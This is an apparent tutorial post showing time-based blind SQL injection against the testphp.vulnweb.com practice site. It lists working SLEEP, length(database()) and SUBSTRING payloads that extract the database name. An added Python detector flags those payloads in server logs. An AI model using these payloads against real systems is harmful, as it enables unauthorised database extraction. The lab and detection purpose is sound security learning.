Ari Ade Supriyatna
Mar 27, 2024

PoC SQL Injection | Day 4
:+:
+%+%+%+%+%+%+%+%+%+%+%+%+%+
<<Guessing whether a website is vulnerable to SQLi or not, based on its response time>>

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(10)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(9)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(8)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(7)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(6)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(5)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
<<Guessing the length, in letters, of the database name>>

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=1,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=2,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=3,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=4,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=5,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=6,SLEEP(5),0)
-%-%-%-%-%-%-%-%-%-%-%-%-%-%-%-%-
<<Guessing each letter, from first to last, of the system's database name>>

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 1, 1) = 'a' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 2, 1) = 'c' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 3, 1) = 'u' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 4, 1) = 'a' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 5, 1) = 'r' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 6, 1) = 't' AND SLEEP(5)

.

.

Yep, that's exactly right, bro!

Database Name =``acuart``=
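
Seen from the defender's side, the three steps above (delay probe, length guess, letter-by-letter guess) leave a recognizable trail in web-server logs. The following Python code is an added example, not part of the original post; the simplified log format (client IP, request, response time in seconds), the sample lines, the documentation-range IPs and the 4-second threshold are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real traffic): client IP, request, response seconds.
SAMPLE_LOG = """\
203.0.113.7 "GET /artists.php?artist=1-SLEEP(5)" 5.03
203.0.113.7 "GET /artists.php?artist=1-IF((length(database()))=6,SLEEP(5),0)" 5.02
203.0.113.7 "GET /artists.php?artist=1%20AND%20SUBSTRING(database(),%201,%201)%20=%20'a'%20AND%20SLEEP(5)" 5.04
198.51.100.9 "GET /artists.php?artist=2" 0.04
198.51.100.9 "GET /artists.php?artist=3" 0.05
"""

LINE = re.compile(r'^(\S+) "GET (\S+)" ([\d.]+)$')
# Stages mirror the three steps in the post; checked from most to least specific.
STAGES = [
    ("char_extraction", re.compile(r"substring\s*\(\s*database\s*\(\s*\)", re.I)),
    ("length_probe", re.compile(r"length\s*\(\s*database\s*\(\s*\)", re.I)),
    ("delay_probe", re.compile(r"sleep\s*\(\s*\d+\s*\)", re.I)),
]

def classify(value):
    """Return the stage name for a decoded parameter value, or None if benign."""
    if value.strip().isdigit():  # a plain numeric id is the expected input
        return None
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return "non_numeric"

def analyze(log_text, param="artist", slow=4.0):
    """Per client: (stage, whether the response was slow, decoded value)."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, secs = m.group(1), m.group(2), float(m.group(3))
        # parse_qs URL-decodes the value, so %20-encoded payloads are matched too
        for value in parse_qs(urlsplit(target).query).get(param, []):
            stage = classify(value)
            if stage:
                findings[ip].append((stage, secs >= slow, value))
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in analyze(SAMPLE_LOG).items():
        for stage, delayed, value in hits:
            print(ip, stage, "delayed" if delayed else "fast", value)
```

A hit whose response was also slow means the injected `SLEEP` actually ran, so the `artist` value reaches the SQL query unescaped. Binding `artist` as an integer parameter in a prepared statement removes the issue.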